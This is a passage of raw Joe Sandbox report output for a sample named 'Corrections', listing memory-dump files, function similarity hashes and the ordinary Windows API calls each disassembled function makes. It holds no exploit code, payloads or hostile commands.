                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1385522511-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 9c13a3579134b7cf86406b79243016bb8c0eaf27e282438c3446577762d9676c
                                                                                                                                                                                                                                                                                            • Instruction ID: c4813c8ee142fe64b4104c57f27a5a52a1e6bcc1639029755bf3f0227200a043
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9c13a3579134b7cf86406b79243016bb8c0eaf27e282438c3446577762d9676c
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0232D0B5A04219DFCB24CF18D884ABEB7B9FF85310F158459E90AAB295C778ED41CB90
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: LoadString
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2948472770-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 54c847c2b8288e223f69dd772c42e1bee15e5e6676184de34679e1c2be8a1559
                                                                                                                                                                                                                                                                                            • Instruction ID: a4e3dddc0191752d213b28ea572c2c36f42aa6d787ae97b8bfdabce4506a55c7
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 54c847c2b8288e223f69dd772c42e1bee15e5e6676184de34679e1c2be8a1559
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B3D13B75A04209EFCB14EFD8D882AEDFBB5FF49310F244159E915AB291DB30AE41CB90
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                            • Opcode ID: c71a90385714296aec7f99d2e0eeef24e3ecc7765caffdcd9a0ebd7b9098757f
                                                                                                                                                                                                                                                                                            • Instruction ID: d21bb5068cd3543c198cb9cbe07533dc719084a55c7d7e4846c12cdf68429c37
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c71a90385714296aec7f99d2e0eeef24e3ecc7765caffdcd9a0ebd7b9098757f
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A951F735A04109AFDB14DF68C860FB97BA5EFC5364F198168E8289B391D771ED42CB90
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CharLowerBuffW.USER32(?,?), ref: 0098FCCE
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: BuffCharLower
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2358735015-0
                                                                                                                                                                                                                                                                                            • Opcode ID: b5b96580851caf8b8b4996cade7d285e6dd951d37b08dedede4729db9b0273e7
                                                                                                                                                                                                                                                                                            • Instruction ID: ba6713fb0dcf5ea6d699450aa0b214b188433bd9563d3f9dde1f3eccdcce9dc3
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b5b96580851caf8b8b4996cade7d285e6dd951d37b08dedede4729db9b0273e7
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C141A4B6500209AFCB11EF68C891AAEB7B8EF84314B11453EE656D7291EB70DE05CB50
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 0092663E: LoadLibraryA.KERNEL32(kernel32.dll,?,?,0092668B,?,?,009262FA,?,00000001,?,?,00000000), ref: 0092664A
                                                                                                                                                                                                                                                                                              • Part of subcall function 0092663E: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0092665C
                                                                                                                                                                                                                                                                                              • Part of subcall function 0092663E: FreeLibrary.KERNEL32(00000000,?,?,0092668B,?,?,009262FA,?,00000001,?,?,00000000), ref: 0092666E
                                                                                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,009262FA,?,00000001,?,?,00000000), ref: 009266AB
                                                                                                                                                                                                                                                                                              • Part of subcall function 00926607: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00965657,?,?,009262FA,?,00000001,?,?,00000000), ref: 00926610
                                                                                                                                                                                                                                                                                              • Part of subcall function 00926607: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00926622
                                                                                                                                                                                                                                                                                              • Part of subcall function 00926607: FreeLibrary.KERNEL32(00000000,?,?,00965657,?,?,009262FA,?,00000001,?,?,00000000), ref: 00926635
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Library$Load$AddressFreeProc
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2632591731-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 050fc8ccce5acf5064a5c27955a02b8505fdb07ce68ce3881f231677a1fcb3dc
                                                                                                                                                                                                                                                                                            • Instruction ID: a016187ffa669730f4922b1b44903d275cd8d389f8f06b5055f60ceff59ec7b1
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 050fc8ccce5acf5064a5c27955a02b8505fdb07ce68ce3881f231677a1fcb3dc
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7D113672600315ABCF14BF20ED02FAD7BA5AF80710F10882DF582A65CAEF75DA04EB50
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: __wsopen_s
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3347428461-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 1f5cf4119ccff8ab8d220bdd18effc01add592d28d3b20b1c1c592f167e3884f
                                                                                                                                                                                                                                                                                            • Instruction ID: c5470f9c44a23eca3de206b12593e5188130fa07d644dda6f1a15e24b1581c6a
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1f5cf4119ccff8ab8d220bdd18effc01add592d28d3b20b1c1c592f167e3884f
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2E11487190420AEFCB05DF59E940A9B7BF8EF48300F1040A9FC09AB311DA31EA25CBA4
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00954FF0: RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,0095319C,00000001,00000364,?,?,?,0000000A,00000000), ref: 00955031
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 009553DF
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: AllocateHeap_free
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 614378929-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 5c7edad85fedc96dc17405c694b3f8ca8b3e31a6960b62d958f97a24a2444c6c
                                                                                                                                                                                                                                                                                            • Instruction ID: 40de923f029e7c4c5f1aa1bc87577315748e1117abe0706bef84678bad7dae86
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5c7edad85fedc96dc17405c694b3f8ca8b3e31a6960b62d958f97a24a2444c6c
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EA01FE72500705ABE331DF5AD841A5AFBEDEBC53B1F65052DE984832C1EB706909C774
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                            • Opcode ID: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
                                                                                                                                                                                                                                                                                            • Instruction ID: 3567e96cfd34ace48d55fec938fdd609fce70ba456e1c4c6a09ed442f2c87b0e
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3CF0283291162456D6717A3B9C15F6A3398AFC3331F200B26FC25932D1EB74E80687D2
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: _wcslen
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 176396367-0
                                                                                                                                                                                                                                                                                            • Opcode ID: d5c573a76357b4ebf737583c416262f8bd59d7773a00564907891ad84ae160d7
                                                                                                                                                                                                                                                                                            • Instruction ID: d09d446e225ba6cc459b7819e0c510311b5f4d2e462ea2c56fa41b7e04b5bc26
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d5c573a76357b4ebf737583c416262f8bd59d7773a00564907891ad84ae160d7
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9AF0C8B36017146ED7149F28DC06FA6BB98EB84360F10852AFB19CB1D1DB31E510CBE0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 0099F987
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: EnvironmentVariable
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1431749950-0
                                                                                                                                                                                                                                                                                            • Opcode ID: b43d35c0b074a250a18394744c6bb67e22c4a121f5da58e7c66c952615f6a9c5
                                                                                                                                                                                                                                                                                            • Instruction ID: 28429626308b034a7506ae16373457c8103671b926a1ad0210eaae2d39902cc8
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b43d35c0b074a250a18394744c6bb67e22c4a121f5da58e7c66c952615f6a9c5
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 68F03172604115BFDB05EBA5DC46E9F77B8EFC9720F004055F5059B261DA70A941C751
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,0095319C,00000001,00000364,?,?,?,0000000A,00000000), ref: 00955031
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 4457f4b66ec4589cbc87cc1090ed06b1109e5d2758e0e346953eefccd9f1cfcd
                                                                                                                                                                                                                                                                                            • Instruction ID: 22864a8c8d5514590865fd75a7fe4f46b8a6425dd8c8d5addcd08c8c8ff8844f
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4457f4b66ec4589cbc87cc1090ed06b1109e5d2758e0e346953eefccd9f1cfcd
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 45F09032515A24A79A319A77DC21F5A374CAF817A1F174021EC1CE60D2DA64D80997E0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000,?,?,?,00946A79,?,0000015D,?,?,?,?,009485B0,000000FF,00000000,?,?), ref: 00953BC5
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                                            • Opcode ID: f7e5f842edd43e09890dfe0b8ce3f2dc7da7f3cde4314562140abf90995b3954
                                                                                                                                                                                                                                                                                            • Instruction ID: 5496131665b1c0e52b477f8861c93a79f3751421b3d67bed9242de61738185fa
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f7e5f842edd43e09890dfe0b8ce3f2dc7da7f3cde4314562140abf90995b3954
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 15E0ED31214620A7EA21ABB79C01F7A3B4CAF813E2F168921EC04D6091DB70CE0883A0
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                            • Opcode ID: 8d13a4c448eda33b1e6d0cd4e191783f55c8d541661f397231aac55151fc7e79
                                                                                                                                                                                                                                                                                            • Instruction ID: 0248f4342261a55d343ebbeafe66ce92d3761565afc1f5345f647a353ec3d071
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8d13a4c448eda33b1e6d0cd4e191783f55c8d541661f397231aac55151fc7e79
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 88F06D71106722CFCB389F68E8A4816BBF8BF143293248E3EE1D786A10C7759840DF50
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ClearVariant
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1473721057-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 3ade1a9faeffbbe271f0776a5446df5bb7f50476173f58f79754f6e9297a6811
                                                                                                                                                                                                                                                                                            • Instruction ID: 16865d297994a191153dd469ef449797fcee600e35b2b050c263a05f357fbd4d
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3ade1a9faeffbbe271f0776a5446df5bb7f50476173f58f79754f6e9297a6811
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 44F0E572708A01AAE7304B64A805BA1F7E8EB40315F10891AD4D9C3181D7B644949B51
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_920000_Corrections.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: __fread_nolock
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2638373210-0
                                                                                                                                                                                                                                                                                            • Opcode ID: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
